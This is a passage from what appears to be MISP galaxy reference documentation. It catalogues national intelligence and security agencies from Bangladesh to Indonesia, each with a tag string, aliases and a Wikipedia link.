https://en.wikipedia.org/wiki/Counter_Terrorism_and_Transnational_Crime

Rapid Action Battalion

Rapid Action Battalion – Intelligence Wing (RAB-IW)

The tag is: misp-galaxy:intelligence-agency="Rapid Action Battalion"

Table 1679. Table References

Links

https://en.wikipedia.org/wiki/Rapid_Action_Battalion

Directorate General of Forces Intelligence

Directorate General of Forces Intelligence (DGFI)

The tag is: misp-galaxy:intelligence-agency="Directorate General of Forces Intelligence"

Table 1680. Table References

Links

https://en.wikipedia.org/wiki/Directorate_General_of_Forces_Intelligence

Counter Terrorism and Intelligence Bureau

Counter Terrorism and Intelligence Bureau (CTIB)

The tag is: misp-galaxy:intelligence-agency="Counter Terrorism and Intelligence Bureau"

Table 1681. Table References

Links

https://en.wikipedia.org/wiki/Counter_Terrorism_and_Intelligence_Bureau

National Telecommunication Monitoring Centre

National Telecommunication Monitoring Centre (NTMC)

The tag is: misp-galaxy:intelligence-agency="National Telecommunication Monitoring Centre"

Table 1682. Table References

Links

https://en.wikipedia.org/wiki/National_Telecommunication_Monitoring_Centre

National Board of Revenue

Central Intelligence Unit (CIU)

The tag is: misp-galaxy:intelligence-agency="National Board of Revenue"

Table 1683. Table References

Links

https://en.wikipedia.org/wiki/National_Board_of_Revenue

Bangladesh Financial Intelligence Unit

Bangladesh Financial Intelligence Unit (BFIU)

The tag is: misp-galaxy:intelligence-agency="Bangladesh Financial Intelligence Unit"

Table 1684. Table References

Links

https://en.wikipedia.org/wiki/Bangladesh_Financial_Intelligence_Unit

Digital Security Agency

Digital Security Agency

The tag is: misp-galaxy:intelligence-agency="Digital Security Agency"

Table 1685. Table References

Links

https://en.wikipedia.org/wiki/Digital_Security_Agency

Financial Intelligence Unit (Barbados)

Financial Intelligence Unit (FIU)

The tag is: misp-galaxy:intelligence-agency="Financial Intelligence Unit (Barbados)"

Table 1686. Table References

Links

https://en.wikipedia.org/wiki/Financial_Intelligence_Unit

Criminal Investigations Department

Criminal Investigations Department (CID)

The tag is: misp-galaxy:intelligence-agency="Criminal Investigations Department"

Table 1687. Table References

Links

https://en.wikipedia.org/wiki/Criminal_Investigations_Department

State Security Committee of the Republic of Belarus

State Security Committee of the Republic of Belarus (KDB/KGB) (State Security Committee)

The tag is: misp-galaxy:intelligence-agency="State Security Committee of the Republic of Belarus"

Table 1688. Table References

Links

https://en.wikipedia.org/wiki/State_Security_Committee_of_the_Republic_of_Belarus

Belgian State Security Service

VSSE (State Security Service)

The tag is: misp-galaxy:intelligence-agency="Belgian State Security Service"

Table 1689. Table References

Links

https://en.wikipedia.org/wiki/Belgian_State_Security_Service

Belgian General Information and Security Service

ADIV/SGRS (General Intelligence and Security Service, military intelligence)

The tag is: misp-galaxy:intelligence-agency="Belgian General Information and Security Service"

Table 1690. Table References

Links

https://en.wikipedia.org/wiki/Belgian_General_Information_and_Security_Service

Intelligence-Security Agency of Bosnia and Herzegovina

Intelligence-Security Agency of Bosnia and Herzegovina (OSA)

The tag is: misp-galaxy:intelligence-agency="Intelligence-Security Agency of Bosnia and Herzegovina"

Table 1691. Table References

Links

https://en.wikipedia.org/wiki/Intelligence-Security_Agency_of_Bosnia_and_Herzegovina

Državna Agencija za Istrage i Zaštitu

Državna Agencija za Istrage i Zaštitu (State Investigation and Protection Agency, SIPA)

The tag is: misp-galaxy:intelligence-agency="Državna Agencija za Istrage i Zaštitu"

Table 1692. Table References

Links

https://en.wikipedia.org/wiki/Dr%C5%BEavna_Agencija_za_Istrage_i_Za%C5%A1titu

Directorate of Intelligence and Security

Directorate on Intelligence and Security Services (DISS – Ministry of State President Espionage & Counter Intelligence unit)

The tag is: misp-galaxy:intelligence-agency="Directorate of Intelligence and Security"

Table 1693. Table References

Links

https://en.wikipedia.org/wiki/Directorate_of_Intelligence_and_Security

Brazilian Intelligence Agency

Brazilian Intelligence Agency (ABIN)

The tag is: misp-galaxy:intelligence-agency="Brazilian Intelligence Agency"

Table 1694. Table References

Links

https://en.wikipedia.org/wiki/Brazilian_Intelligence_Agency

Federal Police Department

Federal Police Department (DPF) (counterintelligence agency)

The tag is: misp-galaxy:intelligence-agency="Federal Police Department"

Table 1695. Table References

Links

https://en.wikipedia.org/wiki/Federal_Police_Department

Institutional Security Bureau

Gabinete de Segurança Institucional (Institutional Security Bureau) (GSI) Responds directly to the president’s office and the armed forces. Coordinates some intelligence operations.

The tag is: misp-galaxy:intelligence-agency="Institutional Security Bureau"

Table 1696. Table References

Links

https://en.wikipedia.org/wiki/Institutional_Security_Bureau

Secretaria da Receita Federal do Brasil

Secretaria da Receita Federal do Brasil (Federal Revenue Secretariat) (RFB) (General Coordination for Research and Investigations - Coordenação-Geral de Pesquisa e Investigação - Copei)

The tag is: misp-galaxy:intelligence-agency="Secretaria da Receita Federal do Brasil"

Table 1697. Table References

Links

https://en.wikipedia.org/wiki/Secretaria_da_Receita_Federal_do_Brasil

Internal Security Department (Brunei)

Internal Security Department (Brunei) (internal)

The tag is: misp-galaxy:intelligence-agency="Internal Security Department (Brunei)"

Table 1698. Table References

Links

https://en.wikipedia.org/wiki/Internal_Security_Department_(Brunei)

National Intelligence Service (Bulgaria)

State Intelligence Agency (Държавна агенция „Разузнаване“ (DAR)) – overseas intelligence gathering service under the supervision of the Council of Ministers of Bulgaria

The tag is: misp-galaxy:intelligence-agency="National Intelligence Service (Bulgaria)"

Table 1699. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_Service_(Bulgaria)

State Agency for National Security

State Agency for National Security (Държавна агенция за национална сигурност (DANS)) – national security service under the supervision of the Council of Ministers of Bulgaria

The tag is: misp-galaxy:intelligence-agency="State Agency for National Security"

Table 1700. Table References

Links

https://en.wikipedia.org/wiki/State_Agency_for_National_Security

National Intelligence Service (Burundi)

Service national de renseignement (SNR)

The tag is: misp-galaxy:intelligence-agency="National Intelligence Service (Burundi)"

Table 1701. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_Service_(Burundi)

Canadian Security Intelligence Service

Canadian Security Intelligence Service (CSIS)

The tag is: misp-galaxy:intelligence-agency="Canadian Security Intelligence Service"

Table 1702. Table References

Links

https://en.wikipedia.org/wiki/Canadian_Security_Intelligence_Service

Communications Security Establishment Canada

Communications Security Establishment (CSE)

The tag is: misp-galaxy:intelligence-agency="Communications Security Establishment Canada"

Table 1703. Table References

Links

https://en.wikipedia.org/wiki/Communications_Security_Establishment_Canada

Canadian Forces Military Police

Canadian Forces National Counter-Intelligence Unit (DND) operated by the Canadian Forces Military Police Group

The tag is: misp-galaxy:intelligence-agency="Canadian Forces Military Police"

Table 1704. Table References

Links

https://en.wikipedia.org/wiki/Canadian_Forces_Military_Police

Joint Task Force X

Joint Task Force X

The tag is: misp-galaxy:intelligence-agency="Joint Task Force X"

Criminal Intelligence Service Canada

Criminal Intelligence Service Canada (CISC)

The tag is: misp-galaxy:intelligence-agency="Criminal Intelligence Service Canada"

Table 1705. Table References

Links

https://en.wikipedia.org/wiki/Criminal_Intelligence_Service_Canada

Intelligence Branch

Intelligence Branch

The tag is: misp-galaxy:intelligence-agency="Intelligence Branch"

Table 1706. Table References

Links

https://en.wikipedia.org/wiki/Intelligence_Branch

Financial Transactions and Reports Analysis Centre of Canada

Financial Transactions and Reports Analysis Centre of Canada (FINTRAC)

The tag is: misp-galaxy:intelligence-agency="Financial Transactions and Reports Analysis Centre of Canada"

Table 1707. Table References

Links

https://en.wikipedia.org/wiki/Financial_Transactions_and_Reports_Analysis_Centre_of_Canada

Global Affairs Canada

Global Affairs Canada (GAC) Bureau of Intelligence Analysis and Security and Bureau of Economic Intelligence

The tag is: misp-galaxy:intelligence-agency="Global Affairs Canada"

Table 1708. Table References

Links

https://en.wikipedia.org/wiki/Global_Affairs_Canada

Royal Canadian Mounted Police

Royal Canadian Mounted Police (RCMP) Intelligence Division

The tag is: misp-galaxy:intelligence-agency="Royal Canadian Mounted Police"

Table 1709. Table References

Links

https://en.wikipedia.org/wiki/Royal_Canadian_Mounted_Police

Canada Border Services Agency

Canada Border Services Agency (CBSA) Immigrations Intelligence

The tag is: misp-galaxy:intelligence-agency="Canada Border Services Agency"

Table 1710. Table References

Links

https://en.wikipedia.org/wiki/Canada_Border_Services_Agency

Canadian Coast Guard

Canadian Coast Guard (CCG)

The tag is: misp-galaxy:intelligence-agency="Canadian Coast Guard"

Table 1711. Table References

Links

https://en.wikipedia.org/wiki/Canadian_Coast_Guard

Agence nationale de sécurité

Agence nationale de sécurité (ANS)

The tag is: misp-galaxy:intelligence-agency="Agence nationale de sécurité"

Table 1712. Table References

Links

https://en.wikipedia.org/wiki/Agence_nationale_de_s%C3%A9curit%C3%A9

Agencia Nacional de Inteligencia

National Intelligence Agency (ANI) – Agencia Nacional de Inteligencia

The tag is: misp-galaxy:intelligence-agency="Agencia Nacional de Inteligencia"

Table 1713. Table References

Links

https://en.wikipedia.org/wiki/Agencia_Nacional_de_Inteligencia

610 Office

610 Office

The tag is: misp-galaxy:intelligence-agency="610 Office"

Table 1714. Table References

Links

https://en.wikipedia.org/wiki/610_Office

International Liaison Department of the Chinese Communist Party

International Department (ID)

The tag is: misp-galaxy:intelligence-agency="International Liaison Department of the Chinese Communist Party"

Table 1715. Table References

Links

https://en.wikipedia.org/wiki/International_Liaison_Department_of_the_Chinese_Communist_Party

United Front Work Department

United Front Work Department (UFWD)

The tag is: misp-galaxy:intelligence-agency="United Front Work Department"

Table 1716. Table References

Links

https://en.wikipedia.org/wiki/United_Front_Work_Department

Joint Staff Department of the Central Military Commission Intelligence Bureau

Intelligence Bureau of the General Staff aka 2nd Bureau

The tag is: misp-galaxy:intelligence-agency="Joint Staff Department of the Central Military Commission Intelligence Bureau"

Table 1717. Table References

Links

https://en.wikipedia.org/wiki/Joint_Staff_Department_of_the_Central_Military_Commission_Intelligence_Bureau

People’s Liberation Army Air Force

People’s Liberation Army Air Force (PLAAF)

The tag is: misp-galaxy:intelligence-agency="People’s Liberation Army Air Force"

Table 1718. Table References

Links

https://en.wikipedia.org/wiki/People%27s_Liberation_Army_Air_Force

People’s Liberation Army General Political Department

People’s Liberation Army General Political Department (GND)

The tag is: misp-galaxy:intelligence-agency="People’s Liberation Army General Political Department"

Table 1719. Table References

Links

https://en.wikipedia.org/wiki/People%27s_Liberation_Army_General_Political_Department

People’s Liberation Army General Staff Department

People’s Liberation Army General Staff Department (GSD)

The tag is: misp-galaxy:intelligence-agency="People’s Liberation Army General Staff Department"

Table 1720. Table References

Links

https://en.wikipedia.org/wiki/People%27s_Liberation_Army_General_Staff_Department

PLA Unit 61398

PLA Unit 61398 aka APT 1

The tag is: misp-galaxy:intelligence-agency="PLA Unit 61398"

Table 1721. Table References

Links

https://en.wikipedia.org/wiki/PLA_Unit_61398

State Administration of Foreign Experts Affairs

State Administration of Foreign Experts Affairs (SAFEA)

The tag is: misp-galaxy:intelligence-agency="State Administration of Foreign Experts Affairs"

Table 1722. Table References

Links

https://en.wikipedia.org/wiki/State_Administration_of_Foreign_Experts_Affairs

Ministry of Public Security (China)

Ministry of Public Security (MPS)

The tag is: misp-galaxy:intelligence-agency="Ministry of Public Security (China)"

Table 1723. Table References

Links

https://en.wikipedia.org/wiki/Ministry_of_Public_Security_(China)

Ministry of State Security (China)

Ministry of State Security (MSS)

The tag is: misp-galaxy:intelligence-agency="Ministry of State Security (China)"

Table 1724. Table References

Links

https://en.wikipedia.org/wiki/Ministry_of_State_Security_(China)

Office for Safeguarding National Security of the CPG in the HKSAR

Office for Safeguarding National Security of the CPG in the HKSAR (CPGNSO)

The tag is: misp-galaxy:intelligence-agency="Office for Safeguarding National Security of the CPG in the HKSAR"

Table 1725. Table References

Links

https://en.wikipedia.org/wiki/Office_for_Safeguarding_National_Security_of_the_CPG_in_the_HKSAR

National Intelligence Directorate (Colombia)

Dirección Nacional de Inteligencia (DNI)

The tag is: misp-galaxy:intelligence-agency="National Intelligence Directorate (Colombia)"

Table 1726. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_Directorate_(Colombia)

National Intelligence Agency (Democratic Republic of the Congo)

National Intelligence Agency (ANR)

The tag is: misp-galaxy:intelligence-agency="National Intelligence Agency (Democratic Republic of the Congo)"

Table 1727. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_Agency_(Democratic_Republic_of_the_Congo)

DEMIAP

General Staff of Military intelligence (ex-DEMIAP)

The tag is: misp-galaxy:intelligence-agency="DEMIAP"

Table 1728. Table References

Links

https://en.wikipedia.org/wiki/DEMIAP

Security and Intelligence Agency

Sigurnosno-obavještajna agencija (SOA) (Security and Intelligence Agency)

The tag is: misp-galaxy:intelligence-agency="Security and Intelligence Agency"

Table 1729. Table References

Links

https://en.wikipedia.org/wiki/Security_and_Intelligence_Agency

Vojna sigurnosno-obavještajna agencija

Vojna sigurnosno-obavještajna agencija (VSOA) (Military Security and Intelligence Agency)

The tag is: misp-galaxy:intelligence-agency="Vojna sigurnosno-obavještajna agencija"

Table 1730. Table References

Links

https://en.wikipedia.org/wiki/Vojna_sigurnosno-obavje%C5%A1tajna_agencija

Dirección de Contra-Inteligencia Militar

Military Counterintelligence Directorate

The tag is: misp-galaxy:intelligence-agency="Dirección de Contra-Inteligencia Militar"

Table 1731. Table References

Links

https://en.wikipedia.org/wiki/Direcci%C3%B3n_de_Contra-Inteligencia_Militar

Intelligence Directorate

Dirección General de Inteligencia (DGI)

The tag is: misp-galaxy:intelligence-agency="Intelligence Directorate"

Table 1732. Table References

Links

https://en.wikipedia.org/wiki/Intelligence_Directorate

Cyprus Intelligence Service

Cyprus Intelligence Service (CIS) (Κυπριακή Υπηρεσία Πληροφοριών, ΚΥΠ), former Central Intelligence Service (KYP)

The tag is: misp-galaxy:intelligence-agency="Cyprus Intelligence Service"

Table 1733. Table References

Links

https://en.wikipedia.org/wiki/Cyprus_Intelligence_Service

Security Information Service

Security Information Service (Bezpečnostní informační služba, BIS)

The tag is: misp-galaxy:intelligence-agency="Security Information Service"

Table 1734. Table References

Links

https://en.wikipedia.org/wiki/Security_Information_Service

Office for Foreign Relations and Information

Office for Foreign Relations and Information (Úřad pro zahraniční styky a informace, ÚZSI)

The tag is: misp-galaxy:intelligence-agency="Office for Foreign Relations and Information"

Table 1735. Table References

Links

https://en.wikipedia.org/wiki/Office_for_Foreign_Relations_and_Information

Military Intelligence (Czech Republic)

Military Intelligence (Vojenské zpravodajství, VZ)

The tag is: misp-galaxy:intelligence-agency="Military Intelligence (Czech Republic)"

Table 1736. Table References

Links

https://en.wikipedia.org/wiki/Military_Intelligence_(Czech_Republic)

Danish Security and Intelligence Service

Danish Security and Intelligence Service (Politiets Efterretningstjeneste (PET)).

The tag is: misp-galaxy:intelligence-agency="Danish Security and Intelligence Service"

Table 1737. Table References

Links

https://en.wikipedia.org/wiki/Danish_Security_and_Intelligence_Service

Danish Defence Intelligence Service

Danish Defence Intelligence Service (Forsvarets Efterretningstjeneste (FE)).

The tag is: misp-galaxy:intelligence-agency="Danish Defence Intelligence Service"

Table 1738. Table References

Links

https://en.wikipedia.org/wiki/Danish_Defence_Intelligence_Service

Army Intelligence Center

Army Intelligence Center (Efterretningsregimentet (EFR)).

The tag is: misp-galaxy:intelligence-agency="Army Intelligence Center"

Table 1739. Table References

Links

https://en.wikipedia.org/wiki/Army_Intelligence_Center

Egyptian General Intelligence Directorate

Gihaz al-Mukhabarat al-Amma (GIS) (General Intelligence Service)

The tag is: misp-galaxy:intelligence-agency="Egyptian General Intelligence Directorate"

Table 1740. Table References

Links

https://en.wikipedia.org/wiki/Egyptian_General_Intelligence_Directorate

Military intelligence and reconnaissance (Egypt)

Idarat al-Mukhabarat al-Harbyya wa al-Istitla (OMIR) (Office of Military Intelligence and Reconnaissance)

The tag is: misp-galaxy:intelligence-agency="Military intelligence and reconnaissance (Egypt)"

Table 1741. Table References

Links

https://en.wikipedia.org/wiki/Military_intelligence_and_reconnaissance_(Egypt)

Egyptian Homeland security

Al-amn al-Watani (HS) (Homeland Security)

The tag is: misp-galaxy:intelligence-agency="Egyptian Homeland security"

Table 1742. Table References

Links

https://en.wikipedia.org/wiki/Egyptian_Homeland_security

National Security Office (Eritrea)

National Security Office

The tag is: misp-galaxy:intelligence-agency="National Security Office (Eritrea)"

Table 1743. Table References

Links

https://en.wikipedia.org/wiki/National_Security_Office_(Eritrea)

Estonian Internal Security Service

Estonian Internal Security Service (KaPo) (Kaitsepolitseiamet)

The tag is: misp-galaxy:intelligence-agency="Estonian Internal Security Service"

Estonian Internal Security Service is also known as:

  • Kaitsepolitseiamet

Table 1744. Table References

Links

https://en.wikipedia.org/wiki/Estonian_Internal_Security_Service

Estonian Foreign Intelligence Service

Estonian Foreign Intelligence Service (VLA) (Välisluureamet)

The tag is: misp-galaxy:intelligence-agency="Estonian Foreign Intelligence Service"

Estonian Foreign Intelligence Service is also known as:

  • VLA

  • Välisluureamet

Table 1745. Table References

Links

https://en.wikipedia.org/wiki/Estonian_Foreign_Intelligence_Service

National Intelligence and Security Service (Ethiopia)

National Intelligence and Security Service (NISS)

The tag is: misp-galaxy:intelligence-agency="National Intelligence and Security Service (Ethiopia)"

Table 1746. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_and_Security_Service_(Ethiopia)

Finnish Defence Intelligence Agency

Finnish Defence Intelligence Agency – Puolustusvoimien tiedustelulaitos (PVTIEDL) / Försvarsmaktens underrättelsetjänst

The tag is: misp-galaxy:intelligence-agency="Finnish Defence Intelligence Agency"

Finnish Defence Intelligence Agency is also known as:

  • Puolustusvoimien tiedustelulaitos (PVTIEDL)

  • Försvarsmaktens underrättelsetjänst

Table 1747. Table References

Links

https://en.wikipedia.org/wiki/Finnish_Defence_Intelligence_Agency

Intelligence Division (Finland)

Defense Command Intelligence Division – Pääesikunnan tiedusteluosasto (PE TIEDOS) / Huvudstabens underrättelseavdelning

The tag is: misp-galaxy:intelligence-agency="Intelligence Division (Finland)"

Intelligence Division (Finland) is also known as:

  • Pääesikunnan tiedusteluosasto (PE TIEDOS) / Huvudstabens underrättelseavdelning

Table 1748. Table References

Links

https://en.wikipedia.org/wiki/Intelligence_Division_(Finland)

Finnish Security Intelligence Service

Finnish Security Intelligence Service (SUPO) – Suojelupoliisi / Skyddspolisen

The tag is: misp-galaxy:intelligence-agency="Finnish Security Intelligence Service"

Finnish Security Intelligence Service is also known as:

  • Suojelupoliisi / Skyddspolisen

Table 1749. Table References

Links

https://en.wikipedia.org/wiki/Finnish_Security_Intelligence_Service

National Centre for Counter Terrorism

National Centre for Counter Terrorism (CNRLT, Coordination nationale du renseignement et de la lutte contre le terrorisme)

The tag is: misp-galaxy:intelligence-agency="National Centre for Counter Terrorism"

National Centre for Counter Terrorism is also known as:

  • Coordination nationale du renseignement et de la lutte contre le terrorisme

Table 1750. Table References

Links

https://en.wikipedia.org/wiki/National_Centre_for_Counter_Terrorism

General Directorate for Internal Security

General Directorate for Internal Security (DGSI; Direction générale de la sécurité intérieure) – Domestic counter-terrorism and counter-espionage intelligence.

The tag is: misp-galaxy:intelligence-agency="General Directorate for Internal Security"

General Directorate for Internal Security is also known as:

  • Direction générale de la sécurité intérieure

Table 1751. Table References

Links

https://en.wikipedia.org/wiki/General_Directorate_for_Internal_Security

direction nationale du renseignement territorial (DNRT)

direction nationale du renseignement territorial (DNRT)

The tag is: misp-galaxy:intelligence-agency="direction nationale du renseignement territorial (DNRT)"

direction nationale du renseignement territorial (DNRT) is also known as:

  • direction nationale du renseignement territorial

Sous-direction anti-terroriste (SDAT)

Sous-direction anti-terroriste (SDAT)

The tag is: misp-galaxy:intelligence-agency="Sous-direction anti-terroriste (SDAT)"

Sous-direction anti-terroriste (SDAT) is also known as:

  • Sous-direction anti-terroriste

Directorate-General for External Security

Directorate-General for External Security (DGSE; Direction générale de la sécurité extérieure) – Foreign intelligence relating to national security.

The tag is: misp-galaxy:intelligence-agency="Directorate-General for External Security"

Directorate-General for External Security is also known as:

  • Direction générale de la sécurité extérieure

Table 1752. Table References

Links

https://en.wikipedia.org/wiki/Directorate-General_for_External_Security

DRSD

Direction du Renseignement et de la Sécurité de la Défense (DRSD) – Foreign intelligence relating to national security.

The tag is: misp-galaxy:intelligence-agency="DRSD"

DRSD is also known as:

  • Direction du Renseignement et de la Sécurité de la Défense

Table 1753. Table References

Links

https://en.wikipedia.org/wiki/DRSD

Direction du renseignement militaire

Directorate of Military Intelligence (DRM; Direction du renseignement militaire) – Military intelligence.

The tag is: misp-galaxy:intelligence-agency="Direction du renseignement militaire"

Table 1754. Table References

Links

https://en.wikipedia.org/wiki/Direction_du_renseignement_militaire

Tracfin

Tracfin

The tag is: misp-galaxy:intelligence-agency="Tracfin"

Table 1755. Table References

Links

https://en.wikipedia.org/wiki/Tracfin

Direction Nationale du Renseignement et des Enquêtes Douanières

Direction Nationale du Renseignement et des Enquêtes Douanières (DNRED)

The tag is: misp-galaxy:intelligence-agency="Direction Nationale du Renseignement et des Enquêtes Douanières"

Table 1756. Table References

Links

https://en.wikipedia.org/wiki/Direction_Nationale_du_Renseignement_et_des_Enqu%C3%AAtes_Douani%C3%A8res

State Intelligence Services (the Gambia)

State Intelligence Services (the Gambia) (SIS)

The tag is: misp-galaxy:intelligence-agency="State Intelligence Services (the Gambia)"

Table 1757. Table References

Links

https://en.wikipedia.org/wiki/State_Intelligence_Services_(the_Gambia)

State Security Service (Georgia)

State Security Service (SSSG) – სახელმწიფო უშიშროების სამსახური

The tag is: misp-galaxy:intelligence-agency="State Security Service (Georgia)"

State Security Service (Georgia) is also known as:

  • სახელმწიფო უშიშროების სამსახური

Table 1758. Table References

Links

https://en.wikipedia.org/wiki/State_Security_Service_(Georgia)

Georgian Intelligence Service

Georgian Intelligence Service (GIS) – საქართველოს დაზვერვის სამსახური

The tag is: misp-galaxy:intelligence-agency="Georgian Intelligence Service"

Georgian Intelligence Service is also known as:

  • საქართველოს დაზვერვის სამსახური

Table 1759. Table References

Links

https://en.wikipedia.org/wiki/Georgian_Intelligence_Service

Military Intelligence Department

Military Intelligence Department

The tag is: misp-galaxy:intelligence-agency="Military Intelligence Department"

Bundesnachrichtendienst

Bundesnachrichtendienst (BND): Federal Intelligence Service

The tag is: misp-galaxy:intelligence-agency="Bundesnachrichtendienst"

Bundesnachrichtendienst is also known as:

  • Federal Intelligence Service

Table 1760. Table References

Links

https://en.wikipedia.org/wiki/Bundesnachrichtendienst

Bundesamt für Verfassungsschutz

Bundesamt für Verfassungsschutz (BfV): Federal Office for the Protection of the Constitution

The tag is: misp-galaxy:intelligence-agency="Bundesamt für Verfassungsschutz"

Bundesamt für Verfassungsschutz is also known as:

  • Federal Office for the Protection of the Constitution

Table 1761. Table References

Links

https://en.wikipedia.org/wiki/Bundesamt_f%C3%BCr_Verfassungsschutz

Federal Office for Information Security

Bundesamt für Sicherheit in der Informationstechnik (BSI): Federal Office for Information Security

The tag is: misp-galaxy:intelligence-agency="Federal Office for Information Security"

Table 1762. Table References

Links

https://en.wikipedia.org/wiki/Federal_Office_for_Information_Security

Zentrum für Informations- und Kommunikationstechnik (IKTZ): Center for information and communication technology

Zentrum für Informations- und Kommunikationstechnik (IKTZ): Center for information and communication technology

The tag is: misp-galaxy:intelligence-agency="Zentrum für Informations- und Kommunikationstechnik (IKTZ): Center for information and communication technology"

Zentrum für Informations- und Kommunikationstechnik (IKTZ): Center for information and communication technology is also known as:

  • Center for information and communication technology

Militärischer Abschirmdienst

Militärischer Abschirmdienst (MAD): Military Counterintelligence Service

The tag is: misp-galaxy:intelligence-agency="Militärischer Abschirmdienst"

Militärischer Abschirmdienst is also known as:

  • Military Counterintelligence Service

Table 1763. Table References

Links

https://en.wikipedia.org/wiki/Milit%C3%A4rischer_Abschirmdienst

State Authority for the Protection of the Constitution

Landesamt für Verfassungsschutz (LfV): semi-independent State Authority for the Protection of the Constitution, one in each federal state

The tag is: misp-galaxy:intelligence-agency="State Authority for the Protection of the Constitution"

Table 1764. Table References

Links

https://en.wikipedia.org/wiki/State_Authority_for_the_Protection_of_the_Constitution

Bureau of National Investigations

Bureau of National Investigations (BNI) – (Internal Intelligence Agency)

The tag is: misp-galaxy:intelligence-agency="Bureau of National Investigations"

Table 1765. Table References

Links

https://en.wikipedia.org/wiki/Bureau_of_National_Investigations

National Intelligence Service (Greece)

National Intelligence Service (ΕΥΠ) – Εθνική Υπηρεσία Πληροφοριών

The tag is: misp-galaxy:intelligence-agency="National Intelligence Service (Greece)"

National Intelligence Service (Greece) is also known as:

  • Εθνική Υπηρεσία Πληροφοριών

Table 1766. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_Service_(Greece)

E Division – Intelligence Division

E Division – Intelligence Division

The tag is: misp-galaxy:intelligence-agency="E Division – Intelligence Division"

National Intelligence and Security Agency (NISA)[6][7][8][9]

National Intelligence and Security Agency (NISA)[6][7][8][9]

The tag is: misp-galaxy:intelligence-agency="National Intelligence and Security Agency (NISA)[6][7][8][9]"

Table 1767. Table References

Links

https://en.wikipedia.org#cite_note-6

Service d’Intelligence National

Service d’Intelligence National (SIN) (National Intelligence Service)

The tag is: misp-galaxy:intelligence-agency="Service d’Intelligence National"

Table 1768. Table References

Links

https://en.wikipedia.org/wiki/Service_d%27Intelligence_National

Információs Hivatal

Információs Hivatal (IH) (Information Office)

The tag is: misp-galaxy:intelligence-agency="Információs Hivatal"

Table 1769. Table References

Links

https://en.wikipedia.org/wiki/Inform%C3%A1ci%C3%B3s_Hivatal

Nemzetbiztonsági Hivatal

Alkotmányvédelmi Hivatal (AH) (Constitution Protection Office)

The tag is: misp-galaxy:intelligence-agency="Nemzetbiztonsági Hivatal"

Table 1770. Table References

Links

https://en.wikipedia.org/wiki/Nemzetbiztons%C3%A1gi_Hivatal

Terrorelhárítási Központ

Terrorelhárítási Központ (TEK) (Counter Terrorism Centre)

The tag is: misp-galaxy:intelligence-agency="Terrorelhárítási Központ"

Table 1771. Table References

Links

https://en.wikipedia.org/wiki/Terrorelh%C3%A1r%C3%ADt%C3%A1si_K%C3%B6zpont

Nemzetbiztonsági Szakszolgálat (NBSZ) (Special Service for National Security)

Nemzetbiztonsági Szakszolgálat (NBSZ) (Special Service for National Security)

The tag is: misp-galaxy:intelligence-agency="Nemzetbiztonsági Szakszolgálat (NBSZ) (Special Service for National Security)"

Nemzeti Információs Központ (NIK) (National Information Center)

Nemzeti Információs Központ (NIK) (National Information Center)

The tag is: misp-galaxy:intelligence-agency="Nemzeti Információs Központ (NIK) (National Information Center)"

Icelandic Police

The National Police Commissioner’s Analysis Unit – Greiningardeild Ríkislögreglustjóra (GRLS)

The tag is: misp-galaxy:intelligence-agency="Icelandic Police"

Table 1772. Table References

Links

https://en.wikipedia.org/wiki/Icelandic_Police#The_Icelandic_Intelligence_Service

Icelandic Crisis Response Unit

Icelandic Defense Agency’s Analysis Unit – Greiningardeild Varnarmálastofnunar Íslands (GVMSÍ) (Defunct)

The tag is: misp-galaxy:intelligence-agency="Icelandic Crisis Response Unit"

Table 1773. Table References

Links

https://en.wikipedia.org/wiki/Icelandic_Crisis_Response_Unit#Intelligence_gathering

Research and Analysis Wing

Research and Analysis Wing (R&AW)

The tag is: misp-galaxy:intelligence-agency="Research and Analysis Wing"

Table 1774. Table References

Links

https://en.wikipedia.org/wiki/Research_and_Analysis_Wing

Intelligence Bureau (India)

Intelligence Bureau (IB)

The tag is: misp-galaxy:intelligence-agency="Intelligence Bureau (India)"

Table 1775. Table References

Links

https://en.wikipedia.org/wiki/Intelligence_Bureau_(India)

National Investigation Agency

National Investigation Agency

The tag is: misp-galaxy:intelligence-agency="National Investigation Agency"

Table 1776. Table References

Links

https://en.wikipedia.org/wiki/National_Investigation_Agency

National Technical Research Organisation

National Technical Research Organisation (NTRO)

The tag is: misp-galaxy:intelligence-agency="National Technical Research Organisation"

Table 1777. Table References

Links

https://en.wikipedia.org/wiki/National_Technical_Research_Organisation

Directorate of Revenue Intelligence

Directorate of Revenue Intelligence

The tag is: misp-galaxy:intelligence-agency="Directorate of Revenue Intelligence"

Table 1778. Table References

Links

https://en.wikipedia.org/wiki/Directorate_of_Revenue_Intelligence

Ministry of Finance (India)

Economic Intelligence Council

The tag is: misp-galaxy:intelligence-agency="Ministry of Finance (India)"

Table 1779. Table References

Links

https://en.wikipedia.org/wiki/Ministry_of_Finance_(India)

Enforcement Directorate

Enforcement Directorate

The tag is: misp-galaxy:intelligence-agency="Enforcement Directorate"

Table 1780. Table References

Links

https://en.wikipedia.org/wiki/Enforcement_Directorate

Directorate General of GST Intelligence

Directorate General of GST Intelligence (DGGI)

The tag is: misp-galaxy:intelligence-agency="Directorate General of GST Intelligence"

Table 1781. Table References

Links

https://en.wikipedia.org/wiki/Directorate_General_of_GST_Intelligence

Indian Army

Directorate of Military Intelligence

The tag is: misp-galaxy:intelligence-agency="Indian Army"

Table 1782. Table References

Links

https://en.wikipedia.org/wiki/Indian_Army

Directorate of Air Intelligence (India)

Directorate of Air Intelligence

The tag is: misp-galaxy:intelligence-agency="Directorate of Air Intelligence (India)"

Table 1783. Table References

Links

https://en.wikipedia.org/wiki/Directorate_of_Air_Intelligence_(India)

Directorate of Naval Intelligence (India)

Directorate of Naval Intelligence

The tag is: misp-galaxy:intelligence-agency="Directorate of Naval Intelligence (India)"

Table 1784. Table References

Links

https://en.wikipedia.org/wiki/Directorate_of_Naval_Intelligence_(India)

Joint Cipher Bureau

Joint Cipher Bureau

The tag is: misp-galaxy:intelligence-agency="Joint Cipher Bureau"

Table 1785. Table References

Links

https://en.wikipedia.org/wiki/Joint_Cipher_Bureau

State Intelligence Agency (Indonesia)

State Intelligence Agency (BIN) – Badan Intelijen Negara

The tag is: misp-galaxy:intelligence-agency="State Intelligence Agency (Indonesia)"

State Intelligence Agency (Indonesia) is also known as:

  • Badan Intelijen Negara

Table 1786. Table References

Links

